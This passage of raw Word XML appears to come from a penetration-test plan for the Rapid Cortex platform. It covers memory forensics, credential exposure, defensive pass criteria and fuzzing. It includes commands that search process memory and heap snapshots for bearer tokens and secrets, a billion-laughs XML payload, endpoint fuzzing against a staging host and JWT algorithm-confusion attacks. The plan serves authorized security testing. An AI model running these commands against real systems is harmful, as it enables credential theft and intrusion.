        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Use lldb to attach to a running process</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo lldb -p $(pgrep node)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># In lldb: read memory ranges containing string data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">memory find -s 'Bearer' -- 0x0 0xffffffff</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Volatility — Full System Memory Forensics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Capture memory image (requires root or hypervisor access)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo lime-linux.sh -p /tmp/memory.lime</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Analyze with Volatility 3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 vol.py -f /tmp/memory.lime linux.bash        # shell history</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 vol.py -f /tmp/memory.lime linux.envars      # environment variables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 vol.py -f /tmp/memory.lime linux.psaux       # running processes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Node.js Heap Inspection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Generate heap snapshot from a running Node.js process</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">kill -USR2 $(pgrep node)   # triggers heapdump if node-heapdump installed</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Or use --inspect flag and Chrome DevTools Memory profiler</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">node --inspect apps/api/src/index.js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Connect chrome://inspect → Memory → Take heap snapshot → search for secrets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Rapid Cortex Specific Memory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160"/>
        <w:gridCol w:w="5040"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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Where</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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Finding</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RING_CREDENTIALS_SECRET_ARN contents</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Lambda execution memory</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Ring client_id/client_secret cached after Secrets Manager call</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Cognito admin credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>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CI/CD runner memory</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aws-vault or SSO session tokens</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Agency JWT tokens</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API Lambda memory</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Full JWT tokens if logged or cached in module scope</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DynamoDB query results</w:t>
            </w:r>
          </w:p>
        </w:tc>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Lambda execution memory</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Bulk agency data if queries are not properly scoped</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CAP auth tokens</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CAP ingest Lambda</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X-RC-Cap-Token header value in request object</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Defensive Controls to Verify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Secrets Manager values retrieved per-invocation, not cached in Lambda module scope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Lambda event objects (which may contain auth headers) are never logged</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Node.js process on dev machines runs in a sandboxed environment</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CI/CD runners are ephemeral — no persistent credential storage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aws-vault is used with short-lived STS tokens (max 1 hour), not long-lived keys</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Pass Criteria</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long-lived AWS credentials found in process memory on developer workstations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Ring client credentials not recoverable from Lambda execution memory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JWT tokens appear in CloudWatch log streams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STS temporary credential expiry verified at 1 hour maximum</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Phase 7 — Zero-Day Discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Zero-day discovery focuses on finding previously unknown vulnerabilities — flaws with no public CVE, no existing exploit, and no vendor patch. This is the highest-skill area of offensive security and typically yields the most critical findings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">High-Value Target Areas in Rapid Cortex</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2520"/>
        <w:gridCol w:w="5400"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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Why High Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="540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Attack Vector</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CAP XML parser (cap-parser.ts)</w:t>
            </w:r>
          </w:p>
        </w:tc>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Custom parser — classic source of injection and DoS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="54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Malformed XML, CDATA injection, entity expansion</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JWT authorizer edge cases</w:t>
            </w:r>
          </w:p>
        </w:tc>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Custom auth logic may have gaps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="54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Malformed headers, boundary conditions</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CAD write-back approval race condition</w:t>
            </w:r>
          </w:p>
        </w:tc>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Multi-step workflow with concurrent users</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="54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Parallel requests at approval boundary</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Ring OAuth state collision</w:t>
            </w:r>
          </w:p>
        </w:tc>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Two users from same agency at same second</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="54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Concurrent auth requests</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QR code ULID predictability</w:t>
            </w:r>
          </w:p>
        </w:tc>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If IDs are predictable, scanning yields neighbor codes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="54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ULID timestamp component analysis</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FIPS routing in CAP ingest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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Auto-routing could deliver alerts to wrong agency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="54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Crafted FIPS codes in CAP XML</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DDB condition expression bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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Idempotency check can be bypassed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="54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Race condition on write-back submit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Fuzzing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Fuzzing sends malformed, random, or boundary-condition inputs to find crashes, hangs, or unexpected behavior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">REST API Endpoint Fuzzing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># ffuf — discover hidden endpoints and parameters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/api/api-endpoints.txt \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  -u https://api-staging.rapidcortex.us/FUZZ \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  -H 'Authorization: Bearer {token}' \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  -mc 200,201,202,400,401,403,500 \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  -o ffuf-results.json</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CAP XML Fuzzer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Boofuzz — network protocol fuzzer, adapts to HTTP+XML body</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">pip install boofuzz</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Key mutation targets for cap-parser.ts:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># 1. CDATA sections with special characters: &lt;![CDATA[&lt;injection&gt;]]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># 2. Deeply nested XML: 10,000+ levels of nested elements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># 3. Billion laughs attack: XML entity expansion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#    &lt;?xml version='1.0'?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#    &lt;!DOCTYPE lolz [&lt;!ENTITY lol 'lol'&gt;&lt;!ENTITY lol2 '&amp;lol;&amp;lol;...'&gt;]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># 4. Unicode edge cases in identifier, sender, and description fields</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># 5. Null bytes in string fields</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># 6. Extremely long strings (&gt;1MB) in headline and description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">JWT Boundary Conditions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># jwt_tool — test all known JWT attack vectors</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 jwt_tool.py {token} -X a    # algorithm confusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 jwt_tool.py {token} -X n    # none algorithm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
